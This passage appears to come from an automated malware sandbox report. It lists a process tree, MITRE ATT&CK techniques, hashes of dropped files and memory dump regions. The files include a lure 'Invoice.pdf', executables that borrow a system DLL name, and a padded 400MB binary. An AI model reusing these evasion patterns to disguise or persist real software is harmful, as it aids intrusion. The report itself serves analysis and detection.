"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
4⤵
PID:4444

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:5104

C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
1⤵
- Suspicious use of SetWindowsHookEx
PID:1812

C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
1⤵
PID:344

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Scheduled Task

T1053

Persistence

Registry Run Keys / Startup Folder

T1060

Scheduled Task

T1053

Privilege Escalation

Scheduled Task

T1053

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Peripheral Device Discovery

T1120

Remote System Discovery

T1018

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751
Filesize
717B

MD5
ec8ff3b1ded0246437b1472c69dd1811

SHA1
d813e874c2524e3a7da6c466c67854ad16800326

SHA256
e634c2d1ed20e0638c95597adf4c9d392ebab932d3353f18af1e4421f4bb9cab

SHA512
e967b804cbf2d6da30a532cbc62557d09bd236807790040c6bee5584a482dc09d724fc1d9ac0de6aa5b4e8b1fff72c8ab3206222cc2c95a91035754ac1257552

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751
Filesize
192B

MD5
3ec90b352d8840c7a9ac3d1c6069e966

SHA1
b13c9af8657c7d832eefdb2317397c445234e420

SHA256
9eecbc2c89740bdc0497ebcc0350e58de39a7c392c7eda811b55736ae79ce552

SHA512
53cf4274430f423e6628c20d28ae2b1c52c344afb6458560d2d60897bda54c766859a0a4d7ca4d491cbc44dca63f8d25d5ba43fed765c1bbaacf2548e46e3087

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\MBR7CLLA\library[1].bin
Filesize
259KB

MD5
94aafe6b249b7f529f9d66a6f7d0b80e

SHA1
a83eee4aa9c936a8e423c4b2b7d2b1036a9a0c44

SHA256
41c631caa7c9e95166917bec39627c488400d180622e4b2bb3a3629732692b54

SHA512
e94befd6c2462bbab13e0e66569c78d34d075f15a9923713f9e72bbd7f791103ef20161b7f830a9ad1f2745ccd9e60bbbe7540f87c025d3be4b0dba3d546d5cb

Download Submit
C:\Users\Admin\AppData\Local\Temp\Invoice.pdf
Filesize
163KB

MD5
5441d36f8dcfdd31e75562b380bea7a8

SHA1
70053ce7491743efacaa4b40f452efb3f32df4e8

SHA256
58098a6f25d3fb423b49a97cf917a406c5841d7ac792ef04ecb9646f5629baf3

SHA512
06a19ace54e2ccb25faaba3dce7a4b72010d1002efbd5d3e1cab1f23493dd8ada55803e9cd695a79c6030204224a84c5192b334b2e8c1007713e1f472f645bbe

Download Submit
C:\Users\Admin\AppData\Local\Temp\MRH.exe
Filesize
1.9MB

MD5
18585735c8866b21e2723a6f020bafd0

SHA1
afb5b2c9d5ca57501835b0c56fd97b0641f01d88

SHA256
e9c817d02acaf2fbb59a0a44be05dbb284ee622f50b2e2a598daac8bfb564672

SHA512
88516af4bbbd9562a9ae9840124c6f9f1402f9a15a0ace5e2413023bbd80c37aa441cc39b8b48f8ca58f4192273e16cd590cd2e9e9a4298f6ed5b0497d54e6b8

Download Submit
C:\Users\Admin\AppData\Local\Temp\MRH.exe
Filesize
1.9MB

MD5
18585735c8866b21e2723a6f020bafd0

SHA1
afb5b2c9d5ca57501835b0c56fd97b0641f01d88

SHA256
e9c817d02acaf2fbb59a0a44be05dbb284ee622f50b2e2a598daac8bfb564672

SHA512
88516af4bbbd9562a9ae9840124c6f9f1402f9a15a0ace5e2413023bbd80c37aa441cc39b8b48f8ca58f4192273e16cd590cd2e9e9a4298f6ed5b0497d54e6b8

Download Submit
C:\Users\Admin\AppData\Local\Temp\ROR.exe
Filesize
1.7MB

MD5
63943e27f96fafc738cb258a0d1dccfd

SHA1
06f0fb47b766f83446319ab267bd745ee42a2920

SHA256
2ba396d144c8802258b863f2bd2ac47918e887f2727e24b6bc92778f83a72c57

SHA512
4916ece9c0beade5b6d697dcca5a3f4b1047c607be228bef3cbeb3215f05dba221371f770e3641d8799733d87990f0a17c61eb1acbc5393e2f11facf9d4fb68d

Download Submit
C:\Users\Admin\AppData\Local\Temp\ROR.exe
Filesize
1.7MB

MD5
63943e27f96fafc738cb258a0d1dccfd

SHA1
06f0fb47b766f83446319ab267bd745ee42a2920

SHA256
2ba396d144c8802258b863f2bd2ac47918e887f2727e24b6bc92778f83a72c57

SHA512
4916ece9c0beade5b6d697dcca5a3f4b1047c607be228bef3cbeb3215f05dba221371f770e3641d8799733d87990f0a17c61eb1acbc5393e2f11facf9d4fb68d

Download Submit
C:\Users\Admin\AppData\Local\Temp\advapi32.exe
Filesize
262KB

MD5
1b51fec95f5403305749c4bcb3485b14

SHA1
f4974196213a94911c850504924f38cd9e7fe889

SHA256
3c0d3f9a776c503eca4e0a014006fe1a8f53e5e22138f6add9e45ad0fbf8844e

SHA512
6e8aa862cb2d95fe67c212de2ee59f903a3de6e16bdd87918e31bc2d7de9a1bdd61f756f1bdf35aa41c7e3620650b9ad9bbaa65487d7152fdf7420767a91e90d

Download Submit
C:\Users\Admin\AppData\Local\Temp\advapi32.exe
Filesize
262KB

MD5
1b51fec95f5403305749c4bcb3485b14

SHA1
f4974196213a94911c850504924f38cd9e7fe889

SHA256
3c0d3f9a776c503eca4e0a014006fe1a8f53e5e22138f6add9e45ad0fbf8844e

SHA512
6e8aa862cb2d95fe67c212de2ee59f903a3de6e16bdd87918e31bc2d7de9a1bdd61f756f1bdf35aa41c7e3620650b9ad9bbaa65487d7152fdf7420767a91e90d

Download Submit
C:\Users\Admin\AppData\Local\Temp\advapi32.exe
Filesize
262KB

MD5
1b51fec95f5403305749c4bcb3485b14

SHA1
f4974196213a94911c850504924f38cd9e7fe889

SHA256
3c0d3f9a776c503eca4e0a014006fe1a8f53e5e22138f6add9e45ad0fbf8844e

SHA512
6e8aa862cb2d95fe67c212de2ee59f903a3de6e16bdd87918e31bc2d7de9a1bdd61f756f1bdf35aa41c7e3620650b9ad9bbaa65487d7152fdf7420767a91e90d

Download Submit
C:\Users\Admin\Yisike quoquola fika quaveb\Quoko tace wesa.exe
Filesize
407.8MB

MD5
9036c9d610b1732bbf6595672f7b394c

SHA1
063aa3148edb751576cbfd0644e300b5c6122a48

SHA256
d12ecb5b5135213fe9455e370e060b06de778c17fdad73450eaf251979569992

SHA512
2800e767dfdbe4b5feb5f3a3c19373bc83a304070b4b8a2165dc1295dcd367ac2c3c2ce2a26f40987a673a2269c02ae6a76f48091e08322a2e9a887087a3b657

Download Submit
C:\Users\Admin\Yisike quoquola fika quaveb\Quoko tace wesa.exe
Filesize
411.6MB

MD5
0f78afa333ba8572cc2ceee98d78ca3c

SHA1
bebd6360e79dc1cd16a85d3955dce7d39d24d881

SHA256
e4ca9fa322ccd11416ee671b3a5de1e4b67e961d506f053defff91ab287f2b97

SHA512
c4260498a7b9726a93abc5372eb6608cf5e8a1fde34ffff0c4d61644a05527a4966d182b101aecb6a39bca9587ce40e0ae242ed65479fc1f9469fbc30edfa263

Download Submit
memory/344-212-0x0000021AAA6A0000-0x0000021AAA6C0000-memory.dmp

Filesize
128KB

Download
memory/344-225-0x0000021AAA88F000-0x0000021AAA892000-memory.dmp

Filesize
12KB

Download
memory/344-224-0x0000021AAA88F000-0x0000021AAA892000-memory.dmp

Filesize
12KB

Download
memory/344-223-0x0000021AA8A20000-0x0000021AA8A40000-memory.dmp

Filesize
128KB

Download
memory/344-222-0x0000021AAA88F000-0x0000021AAA892000-memory.dmp

Filesize
12KB

Download
memory/344-214-0x0000021AAA620000-0x0000021AAA640000-memory.dmp

Filesize
128KB

Download
memory/344-226-0x0000021AA8AA0000-0x0000021AA8AC0000-memory.dmp

Filesize
128KB

Download
memory/344-213-0x0000021AA7800000-0x0000021AA7900000-memory.dmp

Filesize
1024KB

Download
memory/344-217-0x0000021AAA540000-0x0000021AAA560000-memory.dmp

Filesize
128KB

Download
memory/344-220-0x0000021ABDBD8000-0x0000021ABDBE0000-memory.dmp

Filesize
32KB

Download
memory/344-227-0x0000021AAA88F000-0x0000021AAA892000-memory.dmp

Filesize
12KB

Download
memory/380-146-0x0000000000000000-mapping.dmp

Download
memory/952-144-0x0000000000000000-mapping.dmp

Download
memory/992-232-0x0000000000400000-0x0000000000405000-memory.dmp

Filesize
20KB

Download
memory/992-134-0x0000000000400000-0x0000000000405000-memory.dmp

Filesize
20KB

Download
memory/992-141-0x0000000000400000-0x0000000000405000-memory.dmp

Filesize
20KB

Download
memory/992-137-0x0000000000400000-0x0000000000405000-memory.dmp

Filesize
20KB

Download
memory/992-167-0x0000000000400000-0x0000000000405000-memory.dmp

Filesize
20KB

Download
memory/992-135-0x000000000040106C-mapping.dmp

Download
memory/1508-142-0x0000000000000000-mapping.dmp

Download
memory/1564-165-0x0000000000000000-mapping.dmp

Download
memory/1896-241-0x0000000000000000-mapping.dmp

Download
memory/2300-198-0x0000000000000000-mapping.dmp

Download
memory/2564-132-0x0000000000940000-0x0000000001BAA000-memory.dmp

Filesize
18.4MB

Download
memory/2564-133-0x00007FFA06FA0000-0x00007FFA07A61000-memory.dmp

Filesize
10.8MB

Download
memory/2564-138-0x00007FFA06FA0000-0x00007FFA07A61000-memory.dmp

Filesize
10.8MB

Download
memory/2900-200-0x0000000000400000-0x0000000000418000-memory.dmp

Filesize
96KB

Download
memory/2900-203-0x0000000005C90000-0x0000000005CF6000-memory.dmp

Filesize
408KB

Download
memory/2900-199-0x0000000000000000-mapping.dmp

Download
memory/2900-204-0x0000000006580000-0x00000000065D0000-memory.dmp

Filesize
320KB

Download
memory/2948-174-0x0000000000000000-mapping.dmp

Download
memory/3084-246-0x0000000002F21000-0x00000000030A8000-memory.dmp

Filesize
1.5MB

Download
memory/3084-229-0x0000000000000000-mapping.dmp

Download
memory/3084-233-0x0000000002768000-0x0000000002F1E000-memory.dmp

Filesize
7.7MB

Download
memory/3084-237-0x0000000002F21000-0x00000000030A8000-memory.dmp

Filesize
1.5MB

Download
memory/3084-238-0x000000000C8A0000-0x000000000CA32000-memory.dmp

Filesize
1.6MB

Download
memory/3084-239-0x0000000002768000-0x0000000002F1E000-memory.dmp

Filesize
7.7MB

Download
memory/3084-240-0x000000000C8A0000-0x000000000CA32000-memory.dmp

Filesize
1.6MB

Download
memory/3692-178-0x0000000000000000-mapping.dmp

Download
memory/3708-162-0x0000000000000000-mapping.dmp

Download
memory/4056-190-0x0000000000000000-mapping.dmp

Download
memory/4264-149-0x0000000000000000-mapping.dmp

Download
memory/4304-172-0x0000000003319000-0x00000000034E0000-memory.dmp

Filesize
1.8MB

Download
memory/4304-168-0x0000000000000000-mapping.dmp

Download
memory/4304-171-0x0000000002A13000-0x0000000003308000-memory.dmp

Filesize
9.0MB

Download
memory/4304-173-0x0000000002A13000-0x0000000003308000-memory.dmp

Filesize
9.0MB

Download
memory/4304-179-0x0000000003319000-0x00000000034E0000-memory.dmp

Filesize
1.8MB

Download
memory/4384-186-0x000000000D7B0000-0x000000000D99F000-memory.dmp

Filesize
1.9MB

Download
memory/4384-195-0x0000000003900000-0x0000000003AC7000-memory.dmp

Filesize
1.8MB

Download
memory/4384-175-0x0000000000000000-mapping.dmp

Download
memory/4384-180-0x0000000002F01000-0x00000000037F6000-memory.dmp

Filesize
9.0MB

Download
memory/4384-181-0x0000000003900000-0x0000000003AC7000-memory.dmp

Filesize
1.8MB

Download
memory/4384-185-0x000000000D7B0000-0x000000000D99F000-memory.dmp

Filesize
1.9MB

Download
memory/4384-188-0x0000000002F01000-0x00000000037F6000-memory.dmp

Filesize
9.0MB

Download
memory/4444-243-0x0000000000400000-0x0000000000428000-memory.dmp

Filesize
160KB

Download
memory/4444-250-0x0000000004F80000-0x0000000004FBC000-memory.dmp

Filesize
240KB

Download
memory/4444-253-0x0000000006E10000-0x0000000006E86000-memory.dmp

Filesize
472KB

Download
memory/4444-249-0x0000000004EF0000-0x0000000004F02000-memory.dmp

Filesize
72KB

Download
memory/4444-248-0x0000000004FE0000-0x00000000050EA000-memory.dmp

Filesize
1.0MB

Download
memory/4444-252-0x0000000006F30000-0x000000000745C000-memory.dmp

Filesize
5.2MB

Download
memory/4444-247-0x00000000054F0000-0x0000000005B08000-memory.dmp

Filesize
6.1MB

Download
memory/4444-245-0x0000000000400000-0x0000000000428000-memory.dmp

Filesize
160KB

Download
memory/4444-242-0x0000000000000000-mapping.dmp

Download
memory/4444-251-0x0000000006200000-0x00000000063C2000-memory.dmp

Filesize
1.8MB

Download
memory/4484-194-0x0000000000400000-0x000000000042C000-memory.dmp

Filesize
176KB

Download
memory/4484-201-0x00000000057F0000-0x0000000005882000-memory.dmp

Filesize
584KB

Download
memory/4484-197-0x0000000005610000-0x00000000056AC000-memory.dmp

Filesize
624KB

Download
memory/4484-202-0x00000000055B0000-0x00000000055BA000-memory.dmp

Filesize
40KB

Download
memory/4484-196-0x0000000005B20000-0x00000000060C4000-memory.dmp

Filesize
5.6MB

Download
memory/4484-192-0x0000000000400000-0x000000000042C000-memory.dmp

Filesize
176KB

Download
memory/4484-191-0x0000000000000000-mapping.dmp

Download
memory/4580-154-0x0000000000000000-mapping.dmp

Download
memory/4588-187-0x0000000000000000-mapping.dmp

Download
memory/4908-189-0x0000000000000000-mapping.dmp

Download
memory/4948-159-0x0000000000000000-mapping.dmp

Download